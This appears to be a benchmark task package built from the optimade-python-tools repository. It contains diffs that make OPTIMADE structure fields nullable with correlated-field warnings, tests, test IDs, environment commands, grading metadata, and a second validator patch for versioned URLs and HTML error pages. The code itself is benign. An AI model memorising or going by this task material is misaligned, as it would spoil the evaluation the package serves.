+) + + class StructureResourceAttributes(EntryResourceAttributes): """This class contains the Field for the attributes used to represent a structure, e.g. unit cell, atoms, positions.""" - elements: List[str] = OptimadeField( + elements: Optional[List[str]] = OptimadeField( ..., description="""Names of the different elements present in the structure. @@ -269,7 +279,7 @@ class StructureResourceAttributes(EntryResourceAttributes): queryable=SupportLevel.MUST, ) - nelements: int = OptimadeField( + nelements: Optional[int] = OptimadeField( ..., description="""Number of different elements in the structure as an integer. @@ -290,7 +300,7 @@ class StructureResourceAttributes(EntryResourceAttributes): queryable=SupportLevel.MUST, ) - elements_ratios: List[float] = OptimadeField( + elements_ratios: Optional[List[float]] = OptimadeField( ..., description="""Relative proportions of different elements in the structure. @@ -314,7 +324,7 @@ class StructureResourceAttributes(EntryResourceAttributes): queryable=SupportLevel.MUST, ) - chemical_formula_descriptive: str = OptimadeField( + chemical_formula_descriptive: Optional[str] = OptimadeField( ..., description="""The chemical formula for a structure as a string in a form chosen by the API implementation. @@ -342,7 +352,7 @@ class StructureResourceAttributes(EntryResourceAttributes): queryable=SupportLevel.MUST, ) - chemical_formula_reduced: str = OptimadeField( + chemical_formula_reduced: Optional[str] = OptimadeField( ..., description="""The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers. The proportion number MUST be omitted if it is 1. @@ -403,7 +413,7 @@ The proportion number MUST be omitted if it is 1. regex=CHEMICAL_FORMULA_REGEXP, ) - chemical_formula_anonymous: str = OptimadeField( + chemical_formula_anonymous: Optional[str] = OptimadeField( ..., description="""The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on. @@ -425,8 +435,10 @@ The proportion number MUST be omitted if it is 1. regex=CHEMICAL_FORMULA_REGEXP, ) - dimension_types: conlist(Periodicity, min_items=3, max_items=3) = OptimadeField( - ..., + dimension_types: Optional[ + conlist(Periodicity, min_items=3, max_items=3) + ] = OptimadeField( + None, description="""List of three integers. For each of the three directions indicated by the three lattice vectors (see property `lattice_vectors`), this list indicates if the direction is periodic (value `1`) or non-periodic (value `0`). Note: the elements in this list each refer to the direction of the corresponding entry in `lattice_vectors` and *not* the Cartesian x, y, z directions. @@ -448,7 +460,7 @@ Note: the elements in this list each refer to the direction of the corresponding queryable=SupportLevel.OPTIONAL, ) - nperiodic_dimensions: int = OptimadeField( + nperiodic_dimensions: Optional[int] = OptimadeField( ..., description="""An integer specifying the number of periodic dimensions in the structure, equivalent to the number of non-zero entries in `dimension_types`. @@ -470,10 +482,10 @@ Note: the elements in this list each refer to the direction of the corresponding queryable=SupportLevel.MUST, ) - lattice_vectors: conlist( - Vector3D_unknown, min_items=3, max_items=3 - ) = OptimadeField( - ..., + lattice_vectors: Optional[ + conlist(Vector3D_unknown, min_items=3, max_items=3) + ] = OptimadeField( + None, description="""The three lattice vectors in Cartesian coordinates, in ångström (Å). - **Type**: list of list of floats or unknown values. @@ -498,7 +510,7 @@ Note: the elements in this list each refer to the direction of the corresponding queryable=SupportLevel.OPTIONAL, ) - cartesian_site_positions: List[Vector3D] = OptimadeField( + cartesian_site_positions: Optional[List[Vector3D]] = OptimadeField( ..., description="""Cartesian positions of each site in the structure. A site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property. @@ -519,7 +531,7 @@ A site is usually used to describe positions of atoms; what atoms can be encount queryable=SupportLevel.OPTIONAL, ) - nsites: int = OptimadeField( + nsites: Optional[int] = OptimadeField( ..., description="""An integer specifying the length of the `cartesian_site_positions` property. @@ -539,7 +551,7 @@ A site is usually used to describe positions of atoms; what atoms can be encount support=SupportLevel.SHOULD, ) - species: List[Species] = OptimadeField( + species: Optional[List[Species]] = OptimadeField( ..., description="""A list describing the species of the sites of this structure. Species can represent pure chemical elements, virtual-crystal atoms representing a statistical occupation of a given site by multiple chemical elements, and/or a location to which there are attached atoms, i.e., atoms whose precise location are unknown beyond that they are attached to that position (frequently used to indicate hydrogen atoms attached to another element, e.g., a carbon with three attached hydrogens might represent a methyl group, -CH3). @@ -605,7 +617,7 @@ Species can represent pure chemical elements, virtual-crystal atoms representing queryable=SupportLevel.OPTIONAL, ) - species_at_sites: List[str] = OptimadeField( + species_at_sites: Optional[List[str]] = OptimadeField( ..., description="""Name of the species at each site (where values for sites are specified with the same order of the property `cartesian_site_positions`). The properties of the species are found in the property `species`. @@ -764,6 +776,48 @@ The properties of the species are found in the property `species`. queryable=SupportLevel.MUST, ) + class Config: + def schema_extra(schema, model): + """Two things need to be added to the schema: + + 1. Constrained types in pydantic do not currently play nicely with + "Required Optional" fields, i.e. fields must be specified but can be null. + The two contrained list fields, `dimension_types` and `lattice_vectors`, + are OPTIMADE 'SHOULD' fields, which means that they are allowed to be null. + + 2. All OPTIMADE 'SHOULD' fields are allowed to be null, so we manually set them + to be `nullable` according to the OpenAPI definition. + + """ + schema["required"].insert(7, "dimension_types") + schema["required"].insert(9, "lattice_vectors") + + nullable_props = ( + prop + for prop in schema["required"] + if schema["properties"][prop].get("support") == SupportLevel.SHOULD + ) + for prop in nullable_props: + schema["properties"][prop]["nullable"] = True + + @root_validator(pre=True) + def warn_on_missing_correlated_fields(cls, values): + """Emit warnings if a field takes a null value when a value + was expected based on the value/nullity of another field. + """ + accumulated_warnings = [] + for field_set in CORRELATED_STRUCTURE_FIELDS: + missing_fields = {f for f in field_set if values.get(f) is None} + if missing_fields and len(missing_fields) != len(field_set): + accumulated_warnings += [ + f"Structure with values {values} is missing fields {missing_fields} which are required if {field_set - missing_fields} are present." + ] + + for warn in accumulated_warnings: + warnings.warn(warn, MissingExpectedField) + + return values + @validator("chemical_formula_reduced", "chemical_formula_hill") def check_ordered_formula(cls, v, field): if v is None: @@ -800,6 +854,9 @@ The properties of the species are found in the property `species`. @validator("chemical_formula_anonymous") def check_anonymous_formula(cls, v): + if v is None: + return v + elements = tuple(re.findall(r"[A-Z][a-z]*", v)) numbers = [int(n.strip()) for n in re.split(r"[A-Z][a-z]*", v) if n.strip()] @@ -830,12 +887,18 @@ The properties of the species are found in the property `species`. @validator("elements") def elements_must_be_alphabetical(cls, v): + if v is None: + return v + if sorted(v) != v: raise ValueError(f"elements must be sorted alphabetically, but is: {v}") return v @validator("elements_ratios") def ratios_must_sum_to_one(cls, v): + if v is None: + return v + if abs(sum(v) - 1) > EPS: raise ValueError( f"elements_ratios MUST sum to 1 within floating point accuracy. It sums to: {sum(v)}" @@ -844,12 +907,10 @@ The properties of the species are found in the property `species`. @validator("nperiodic_dimensions") def check_periodic_dimensions(cls, v, values): - if values.get("dimension_types", []) and v is None: - raise ValueError( - "nperiodic_dimensions is REQUIRED, since dimension_types was provided." - ) + if v is None: + return v - if v != sum(values.get("dimension_types")): + if values.get("dimension_types") and v != sum(values.get("dimension_types")): raise ValueError( f"nperiodic_dimensions ({v}) does not match expected value of {sum(values['dimension_types'])} " f"from dimension_types ({values['dimension_types']})" @@ -859,26 +920,24 @@ The properties of the species are found in the property `species`. @validator("lattice_vectors", always=True) def required_if_dimension_types_has_one(cls, v, values): - if ( - Periodicity.PERIODIC.value in values.get("dimension_types", []) - and v is None - ): - raise ValueError( - f"lattice_vectors is REQUIRED, since dimension_types is not ({(Periodicity.APERIODIC.value,) * 3}) but is " - f"{tuple(getattr(_, 'value', None) for _ in values.get('dimension_types', []))}" - ) + if v is None: + return v - for dim_type, vector in zip(values.get("dimension_types", (None,) * 3), v): - if None in vector and dim_type == Periodicity.PERIODIC.value: - raise ValueError( - f"Null entries in lattice vectors are only permitted when the corresponding dimension type is {Periodicity.APERIODIC.value}. " - f"Here: dimension_types = {tuple(getattr(_, 'value', None) for _ in values.get('dimension_types', []))}, lattice_vectors = {v}" - ) + if values.get("dimension_types"): + for dim_type, vector in zip(values.get("dimension_types", (None,) * 3), v): + if None in vector and dim_type == Periodicity.PERIODIC.value: + raise ValueError( + f"Null entries in lattice vectors are only permitted when the corresponding dimension type is {Periodicity.APERIODIC.value}. " + f"Here: dimension_types = {tuple(getattr(_, 'value', None) for _ in values.get('dimension_types', []))}, lattice_vectors = {v}" + ) return v @validator("lattice_vectors") def null_values_for_whole_vector(cls, v): + if v is None: + return v + for vector in v: if None in vector and any((isinstance(_, float) for _ in vector)): raise ValueError( @@ -888,7 +947,12 @@ The properties of the species are found in the property `species`. @validator("nsites") def validate_nsites(cls, v, values): - if v != len(values.get("cartesian_site_positions", [])): + if v is None: + return v + + if values.get("cartesian_site_positions") and v != len( + values.get("cartesian_site_positions", []) + ): raise ValueError( f"nsites (value: {v}) MUST equal length of cartesian_site_positions " f"(value: {len(values.get('cartesian_site_positions', []))})" @@ -897,35 +961,39 @@ The properties of the species are found in the property `species`. @validator("species_at_sites") def validate_species_at_sites(cls, v, values): - if "nsites" not in values: - raise ValueError( - "Attribute nsites missing so unable to verify species_at_sites." - ) - if len(v) != values.get("nsites", 0): + if v is None: + return v + + if values.get("nsites") and len(v) != values.get("nsites"): raise ValueError( f"Number of species_at_sites (value: {len(v)}) MUST equal number of sites " f"(value: {values.get('nsites', 'Not specified')})" ) - all_species_names = { - getattr(_, "name", None) for _ in values.get("species", [{}]) - } - all_species_names -= {None} - for value in v: - if value not in all_species_names: - raise ValueError( - "species_at_sites MUST be represented by a species' name, " - f"but {value} was not found in the list of species names: {all_species_names}" - ) + if values.get("species"): + all_species_names = { + getattr(_, "name", None) for _ in values.get("species", [{}]) + } + all_species_names -= {None} + for value in v: + if value not in all_species_names: + raise ValueError( + "species_at_sites MUST be represented by a species' name, " + f"but {value} was not found in the list of species names: {all_species_names}" + ) return v @validator("species") def validate_species(cls, v): + if v is None: + return v + all_species = [_.name for _ in v] unique_species = set(all_species) if len(all_species) != len(unique_species): raise ValueError( f"Species MUST be unique based on their 'name'. Found species names: {all_species}" ) + return v @validator("structure_features", always=True) @@ -934,66 +1002,71 @@ The properties of the species are found in the property `species`. raise ValueError( f"structure_features MUST be sorted alphabetically, given value: {v}" ) - # disorder - for species in values.get("species", []): - if len(species.chemical_symbols) > 1: - if StructureFeatures.DISORDER not in v: - raise ValueError( - f"{StructureFeatures.DISORDER.value} MUST be present when any one entry in species " - "has a chemical_symbols list greater than one element" - ) - break - else: - if StructureFeatures.DISORDER in v: - raise ValueError( - f"{StructureFeatures.DISORDER.value} MUST NOT be present, since all species' chemical_symbols " - "lists are equal to or less than one element" - ) + # assemblies - if values.get("assemblies", None) is not None: + if values.get("assemblies") is not None: if StructureFeatures.ASSEMBLIES not in v: raise ValueError( f"{StructureFeatures.ASSEMBLIES.value} MUST be present, since the property of the same name is present" ) - else: - if StructureFeatures.ASSEMBLIES in v: - raise ValueError( - f"{StructureFeatures.ASSEMBLIES.value} MUST NOT be present, " - "since the property of the same name is not present" - ) - # site_attachments - for species in values.get("species", []): - # There is no need to also test "nattached", - # since a Species validator makes sure either both are present or both are None. - if getattr(species, "attached", None) is not None: - if StructureFeatures.SITE_ATTACHMENTS not in v: + elif StructureFeatures.ASSEMBLIES in v: + raise ValueError( + f"{StructureFeatures.ASSEMBLIES.value} MUST NOT be present, " + "since the property of the same name is not present" + ) + + if values.get("species"): + # disorder + for species in values.get("species", []): + if len(species.chemical_symbols) > 1: + if StructureFeatures.DISORDER not in v: + raise ValueError( + f"{StructureFeatures.DISORDER.value} MUST be present when any one entry in species " + "has a chemical_symbols list greater than one element" + ) + break + else: + if StructureFeatures.DISORDER in v: raise ValueError( - f"{StructureFeatures.SITE_ATTACHMENTS.value} MUST be present when any one entry " - "in species includes attached and nattached" + f"{StructureFeatures.DISORDER.value} MUST NOT be present, since all species' chemical_symbols " + "lists are equal to or less than one element" ) - break - else: - if StructureFeatures.SITE_ATTACHMENTS in v: - raise ValueError( - f"{StructureFeatures.SITE_ATTACHMENTS.value} MUST NOT be present, since no species includes " - "the attached and nattached fields" - ) - # implicit_atoms - species_names = [_.name for _ in values.get("species", [])] - for name in species_names: - if name not in values.get("species_at_sites", []): - if StructureFeatures.IMPLICIT_ATOMS not in v: + # site_attachments + for species in values.get("species", []): + # There is no need to also test "nattached", + # since a Species validator makes sure either both are present or both are None. + if getattr(species, "attached", None) is not None: + if StructureFeatures.SITE_ATTACHMENTS not in v: + raise ValueError( + f"{StructureFeatures.SITE_ATTACHMENTS.value} MUST be present when any one entry " + "in species includes attached and nattached" + ) + break + else: + if StructureFeatures.SITE_ATTACHMENTS in v: raise ValueError( - f"{StructureFeatures.IMPLICIT_ATOMS.value} MUST be present when any one entry in species " - "is not represented in species_at_sites" + f"{StructureFeatures.SITE_ATTACHMENTS.value} MUST NOT be present, since no species includes " + "the attached and nattached fields" ) - break - else: - if StructureFeatures.IMPLICIT_ATOMS in v: - raise ValueError( - f"{StructureFeatures.IMPLICIT_ATOMS.value} MUST NOT be present, since all species are " - "represented in species_at_sites" - ) + # implicit_atoms + species_names = [_.name for _ in values.get("species", [])] + for name in species_names: + if values.get( + "species_at_sites" + ) is not None and name not in values.get("species_at_sites", []): + if StructureFeatures.IMPLICIT_ATOMS not in v: + raise ValueError( + f"{StructureFeatures.IMPLICIT_ATOMS.value} MUST be present when any one entry in species " + "is not represented in species_at_sites" + ) + break + else: + if StructureFeatures.IMPLICIT_ATOMS in v: + raise ValueError( + f"{StructureFeatures.IMPLICIT_ATOMS.value} MUST NOT be present, since all species are " + "represented in species_at_sites" + ) + return v diff --git a/optimade/server/warnings.py b/optimade/server/warnings.py index 18f432d7..7ce40c8b 100644 --- a/optimade/server/warnings.py +++ b/optimade/server/warnings.py @@ -37,3 +37,8 @@ class TooManyValues(OptimadeWarning): class QueryParamNotUsed(OptimadeWarning): """A query parameter is not used in this request.""" + + +class MissingExpectedField(OptimadeWarning): + """A field was provided with a null value when a related field was provided + with a value."""
Relax models to allow for all SHOULD fields to be None This PR tracks the relaxation of our models to allow for None values for almost any field. The current approach for this is to make non-should fields have the type pydantic-type `Optional` but a default value of `...`, which is interpreted as a required OpenAPI field that is allowed to be `None`. This PR then also adds the OpenAPI `nullable` property to each of these fields, indicating that they can be null. To-do: - [x] Change Structure model field types to Optional[...] with default values of `...` - [x] Update model validators to allow them to be robust to missing data - [x] Add combinatorial tests for missing data in structures - [x] Only run server tests under Mongo in CI (rather than all tests) - [x] Add `nullable` to schema
**Title** Allow nullable SHOULD fields in structure models and streamline CI testing **Problem** Clients and implementations may legitimately provide `null` for many structure properties that are only recommended (SHOULD) rather than mandatory. The previous schema forced these fields to be present and non‑null, leading to validation errors and mismatched OpenAPI documentation. Additionally, the CI pipeline ran the full test suite for all back‑ends, unnecessarily exercising non‑Mongo server tests. **Root Cause** Model definitions and validators treated SHOULD fields as required non‑nullable values, and the OpenAPI generator did not mark them as nullable. The CI workflow was not scoped to the Mongo‑specific server test set. **Fix / Expected Behavior** - Redefine all SHOULD fields as optional but still required in the payload, allowing `null` values. - Extend the OpenAPI schema to include the `nullable` flag for each of these fields. - Adjust model validators to gracefully handle missing or `null` values and emit appropriate warnings when correlated fields are inconsistently provided. - Insert a warning class to surface cases where a field is `null` while its dependent counterpart has a value. - Restrict the CI workflow to run only the Mongo‑based server tests, reducing unnecessary test execution. **Risk & Validation** - Verify that mandatory (MUST) fields remain strictly enforced and still reject `null`. - Ensure the generated OpenAPI specification correctly lists `nullable` for all intended fields. - Run the updated Mongo server test suite to confirm no regressions and that warnings are emitted as expected. - Perform a quick sanity check that other back‑ends are not adversely impacted by the CI change.
560
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_data/test_bad_structures.json b/tests/models/test_data/test_bad_structures.json index 1204198b..13da97d9 100644 --- a/tests/models/test_data/test_bad_structures.json +++ b/tests/models/test_data/test_bad_structures.json @@ -1503,7 +1503,13 @@ "O", "O" ], - "structure_features": ["assemblies"], + "assemblies": [ + { + "sites_in_groups": [ [0], [1], [2] ], + "group_probabilities": [0.3, 0.5, 0.2] + } + ], + "structure_features": [], "task_id": "mpf_276" }, { @@ -2402,7 +2408,7 @@ "group_probabilities": [0.3, 0.5, 0.2] } ], - "structure_features": ["assemblies"] + "structure_features": [] }, { "task_id": "db/1234567", diff --git a/tests/models/test_structures.py b/tests/models/test_structures.py index 2828c608..84979385 100644 --- a/tests/models/test_structures.py +++ b/tests/models/test_structures.py @@ -1,9 +1,11 @@ # pylint: disable=no-member import pytest +import itertools from pydantic import ValidationError -from optimade.models.structures import StructureResource +from optimade.models.structures import StructureResource, CORRELATED_STRUCTURE_FIELDS +from optimade.server.warnings import MissingExpectedField MAPPER = "StructureMapper" @@ -19,6 +21,33 @@ def test_good_structures(mapper): StructureResource(**mapper(MAPPER).map_back(structure)) +@pytest.mark.filterwarnings("ignore", category=MissingExpectedField) +def test_good_structure_with_missing_data(mapper, good_structure): + """Check deserialization of well-formed structure used + as example data with all combinations of null values + in non-mandatory fields. + """ + structure = {field: good_structure[field] for field in good_structure} + + # Have to include `assemblies` here, although it is only optional, + # `structure_features = ['assemblies']` in the test document so it + # is effectively mandatory + mandatory_fields = ("id", "type", "structure_features", "assemblies") + + total_fields = [ + field + for field in structure["attributes"].keys() + if field not in mandatory_fields + ] + for r in range(len(total_fields)): + for f in itertools.combinations(total_fields, r=r): + incomplete_structure = {field: structure[field] for field in structure} + for field in f: + incomplete_structure["attributes"][field] = None + + StructureResource(**incomplete_structure) + + def test_more_good_structures(good_structures, mapper): """Check well-formed structures with specific edge-cases""" for index, structure in enumerate(good_structures): @@ -27,7 +56,7 @@ def test_more_good_structures(good_structures, mapper): except ValidationError: # Printing to keep the original exception as is, while still being informational print( - f"Good test structure {index} failed to validate from 'test_more_structures.json'" + f"Good test structure {index} failed to validate from 'test_good_structures.json'" ) raise @@ -36,7 +65,9 @@ def test_bad_structures(bad_structures, mapper): """Check badly formed structures""" for index, structure in enumerate(bad_structures): # This is for helping devs finding any errors that may occur - print(f"Trying structure number {index} from 'test_bad_structures.json'") + print( + f"Trying structure number {index}/{len(bad_structures)} from 'test_bad_structures.json'" + ) with pytest.raises(ValidationError): StructureResource(**mapper(MAPPER).map_back(structure)) @@ -139,7 +170,7 @@ deformities = ( @pytest.mark.parametrize("deformity", deformities) -def test_structure_deformities(good_structure, deformity): +def test_structure_fatal_deformities(good_structure, deformity): """Make specific checks upon performing single invalidating deformations of the data of a good structure. @@ -153,3 +184,21 @@ def test_structure_deformities(good_structure, deformity): good_structure["attributes"].update(deformity) with pytest.raises(ValidationError, match=fr".*{re.escape(message)}.*"): StructureResource(**good_structure) + + +minor_deformities = ( + {f: None} for f in set(f for _ in CORRELATED_STRUCTURE_FIELDS for f in _) +) + + +@pytest.mark.parametrize("deformity", minor_deformities) +def test_structure_minor_deformities(good_structure, deformity): + """Make specific checks upon performing single minor invalidations + of the data of a good structure that should emit warnings. + """ + if deformity is None: + StructureResource(**good_structure) + else: + good_structure["attributes"].update(deformity) + with pytest.warns(MissingExpectedField): + StructureResource(**good_structure)
[ "tests/models/test_structures.py::test_good_structure_with_missing_data", "tests/models/test_structures.py::test_more_good_structures", "tests/models/test_structures.py::test_bad_structures", "tests/models/test_structures.py::test_structure_fatal_deformities[None]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity1]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity2]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity3]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity4]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity5]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity6]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity7]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity8]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity9]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity10]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity11]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity12]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity13]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity14]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity15]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity16]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity17]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity18]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity19]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity20]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity21]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity22]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity23]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity0]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity1]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity2]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity3]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity4]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity5]" ]
[]
Function: StructureResource(**data) Location: optimade.models.structures.StructureResource Inputs: a mapping (typically a dict) containing the JSON‑API fields required for a structure resource – notably an “id”, “type”, “attributes” dict with optional fields such as `elements`, `nelements`, `dimension_types`, `lattice_vectors`, `cartesian_site_positions`, `nsites`, `species`, `species_at_sites`, `assemblies`, etc. All fields are optional (they may be omitted or set to `None`) but must obey the model’s validation rules (e.g., matching lengths, correlated field consistency). Outputs: an instantiated StructureResource object representing the validated structure entry; raises `pydantic.ValidationError` if required constraints are violated. Description: Constructs a validated OPTIMADE structure resource model; the signature now accepts many fields as nullable (Optional) to accommodate “SHOULD” fields being `null`. Used directly in the tests for both positive validation and expected failures/warnings. Function: MissingExpectedField Location: optimade.server.warnings.MissingExpectedField Inputs: no positional arguments; inherits from `OptimadeWarning` which itself derives from `UserWarning`. Can be instantiated with an optional message string. Outputs: a warning subclass instance that can be caught with `pytest.warns` or the standard `warnings` module. Description: Warning emitted when a structure provides a `null` value for a field that is expected (non‑null) because another correlated field is present. The tests assert that certain minor deformations raise this warning.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_structures.py" }
{ "num_modified_files": 5, "num_modified_lines": 213, "pr_author": "ml-evs", "pr_labels": [ "models: For issues related to the pydantic models directly", "priority/medium: Issue or PR with a consensus of medium priority", "schema: Concerns the schema models" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat", "dev_ops_enh", "documentation_enh" ], "reason": null, "reasoning": "The issue clearly requests making all SHOULD fields nullable and robust to missing data, updating validators, adding combinatorial tests, and adjusting CI and OpenAPI schema. The provided test changes directly verify these requirements, matching the stated intent without extra expectations. No signals of test suite coupling, implicit naming, missing specs, external URLs, unrelated patch artifacts, or hidden domain knowledge are present, so the task is a clean, solvable feature change.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
33de78f012f11c27c8063dc726c615ae6de9ea84
2021-01-06 15:29:18
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=h1) Report > Merging [#665](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=desc) (ccb9cb5) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/790ab7de2efc17b2a5f16b9024590075e503ceed?el=desc) (790ab7d) will **decrease** coverage by `0.08%`. > The diff coverage is `0.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #665 +/- ## ========================================== - Coverage 93.45% 93.36% -0.09% ========================================== Files 61 61 Lines 3299 3302 +3 ========================================== Hits 3083 3083 - Misses 216 219 +3 ``` | Flag | Coverage Δ | | |---|---|---| | project | `93.36% <0.00%> (-0.09%)` | :arrow_down: | | validator | `66.05% <0.00%> (-0.07%)` | :arrow_down: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/validator/validator.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665/diff?src=pr&el=tree#diff-b3B0aW1hZGUvdmFsaWRhdG9yL3ZhbGlkYXRvci5weQ==) | `82.61% <0.00%> (-0.54%)` | :arrow_down: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=footer). Last update [790ab7d...ccb9cb5](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). ml-evs: Changed to low-priority as this is only an issue in cases where the validator *should* fail anyway, i.e. this PR is just an error message improvement, initially we thought it was bug fix that it was failing *because* of this
materials-consortia__optimade-python-tools-665
diff --git a/optimade/validator/utils.py b/optimade/validator/utils.py index ec07afbc..0f02604b 100644 --- a/optimade/validator/utils.py +++ b/optimade/validator/utils.py @@ -289,13 +289,7 @@ def test_case(test_fn: Callable[[Any], Tuple[Any, str]]): else: result, msg = test_fn(validator, *args, **kwargs) - except json.JSONDecodeError as exc: - msg = ( - "Critical: unable to parse server response as JSON. " - f"{exc.__class__.__name__}: {exc}" - ) - raise exc - except (ResponseError, ValidationError) as exc: + except (json.JSONDecodeError, ResponseError, ValidationError) as exc: msg = f"{exc.__class__.__name__}: {exc}" raise exc except Exception as exc: diff --git a/optimade/validator/validator.py b/optimade/validator/validator.py index 3255b6ad..f67dd00c 100644 --- a/optimade/validator/validator.py +++ b/optimade/validator/validator.py @@ -922,18 +922,24 @@ class ImplementationValidator: for versioned base URLs. """ - expected_status_code = 200 + + # First, check that there is a versions endpoint in the appropriate place: + # If passed a versioned URL, then strip that version from + # the URL before looking for `/versions`. if re.match(VERSIONS_REGEXP, self.base_url_parsed.path) is not None: - expected_status_code = 404 + self.client.base_url = "/".join(self.client.base_url.split("/")[:-1]) response, _ = self._get_endpoint( - CONF.versions_endpoint, expected_status_code=expected_status_code + CONF.versions_endpoint, expected_status_code=200 ) - if expected_status_code == 200: - self._test_versions_endpoint_content( - response, request=CONF.versions_endpoint - ) + self._test_versions_endpoint_content(response, request=CONF.versions_endpoint) + + # If passed a versioned URL, first reset the URL of the client to the + # versioned one, then that this versioned URL does NOT host a versions endpoint + if re.match(VERSIONS_REGEXP, self.base_url_parsed.path) is not None: + self.client.base_url = self.base_url + self._get_endpoint(CONF.versions_endpoint, expected_status_code=404) @test_case def _test_versions_endpoint_content( @@ -1212,9 +1218,12 @@ class ImplementationValidator: if response.status_code not in expected_status_code: message = f"Request to '{request_str}' returned HTTP code {response.status_code} and not expected {expected_status_code}." - message += "\nError(s):" - for error in response.json().get("errors", []): - message += f'\n {error.get("title", "N/A")}: {error.get("detail", "N/A")} ({error.get("source", {}).get("pointer", "N/A")})' + message += "\nAdditional details:" + try: + for error in response.json().get("errors", []): + message += f'\n {error.get("title", "N/A")}: {error.get("detail", "N/A")} ({error.get("source", {}).get("pointer", "N/A")})' + except json.JSONDecodeError: + message += f"\n Could not parse response as JSON. Content type was {response.headers.get('content-type')!r}." raise ResponseError(message) return response, f"received expected response: {response}."
Validator changes: always check unversioned '/versions' and handle rich HTML pages This PR does two things: - Some services e.g. netlify have rich 404 pages which yield unhelpful error messages, those error messages are now improved. - Following discussion in #662, this PR always checks the existence of the unversioned `/versions` endpoint, even when passed a versioned URL
